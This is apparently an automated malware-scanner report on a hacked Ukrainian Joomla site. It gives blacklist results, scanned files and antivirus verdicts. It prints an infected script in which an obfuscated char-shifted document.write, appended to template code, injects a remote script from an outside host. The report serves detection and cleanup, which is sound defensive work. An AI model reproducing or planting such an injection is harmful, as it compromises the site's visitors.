New scan:

Malware Scanner report for decoclay-a.com.ua

Malicious/Suspicious/Total urls checked
1/1/8
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "decoclay-a.com.ua" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=decoclay-a.com.ua

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://decoclay-a.com.ua/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://decoclay-a.com.ua/
200 OK
Content-Length: 36407
Content-Type: text/html
suspicious
Page code contains blacklisted domain: china-fan.in.ua

...[23635 bytes skipped]...
/h3>
<div class="jamod-content"><div class="advs bannergroup_text">
<div class="bannerfooter_text">
<div>TRN.ua – <a href="http://www.trn.ua/" target="_blank">тренинги в Украине</a></div>
<div>Osvita.com.ua – <a href="http://osvita.com.ua/courses/" target="_blank">курсы в Украине</a></div>
<div>china-fan.in.ua – <a href="http://www.china-fan.in.ua">поездки в Китай</a></div>
<div><a href='http://spravka.ua' title='SPRAVKA.UA - Бизнес-Каталог товаров и услуг Украины' target='_blank'>SPRAVKA.UA - Бизнес-Каталог товаров и услуг Украины</a></div>
<div><a href="http://kiev.com.ua/forum/" title="Киев Форум">Киев Форум</a></div&
...[19032 bytes skipped]...

http://decoclay-a.com.ua/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/x-javascript
clean
http://decoclay-a.com.ua/templates/ja_purity/js/ja.script.js
200 OK
Content-Length: 3207
Content-Type: application/x-javascript
clean
http://decoclay-a.com.ua/templates/ja_purity/js/ja.rightcol.js
200 OK
Content-Length: 1859
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JA_Collapse_Mod = new Class({
initialize: function(myElements) {
options = Object.extend({
transition: Fx.Transitions.quadOut
}, {});
this.myElements = myElements;
var exModules = excludeModules.split(',');
exModules.each(function(el,i){exModules[i]='Mod'+el});
myElements.each(function(el, i){
el.elmain = $E('.jamod-content',el);
el.titleEl = $E('h3',el);
if(!el.titleEl) return;
if (exModules.contains(el.id)) {

... 1043 bytes are skipped ...
okie.set(el.id,el.status,{duration:365});
}
if(!el.titleEl.className) el.titleEl.className=rightCollapseDefault;
if(el.titleEl.className=='hide') el.hide();
});
}
});
window.addEvent ('load', function(e){
var jamod = new JA_Collapse_Mod ($ES('.jamod'));
});
<!-- js-tools -->
w=0;while(w<54)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/gnj/l{0dmj0tubu/qiq#?=0tdsjqu?'.charCodeAt(w++)-1))
<!-- /js-tools -->

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.igvg
Sophos
Troj/JSRedir-OK
ESET-NOD32
JS/Kryptik.AH

http://decoclay-a.com.ua//mc.yandex.ru/metrika/watch.js/
404 Not Found
Content-Length: 311
Content-Type: text/html
clean
http://decoclay-a.com.ua/test404page.js
404 Not Found
Content-Length: 295
Content-Type: text/html
clean
http://counter.rambler.ru/top100.jcn?2356641
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://t.proext.com/js/to.js
200 OK
Content-Length: 1863
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: decoclay-a.com.ua

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 18:52:06 GMT
Pragma: no-cache
Server: nginx/1.0.15
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 24 Jun 2014 18:52:06 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: b75af2d6005efb5f44ceb310347e0ff9=84355b1c92942d3f990efee923d345d3; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 14-Jun-2015 18:52:06 GMT; path=/
X-Powered-By: PHP/5.3.24
Second query (visit from search engine):
GET / HTTP/1.1
Host: decoclay-a.com.ua
Referer: http://www.google.com/search?q=decoclay-a.com.ua

Result:
The result is similar to the first query. There are no suspicious redirects found.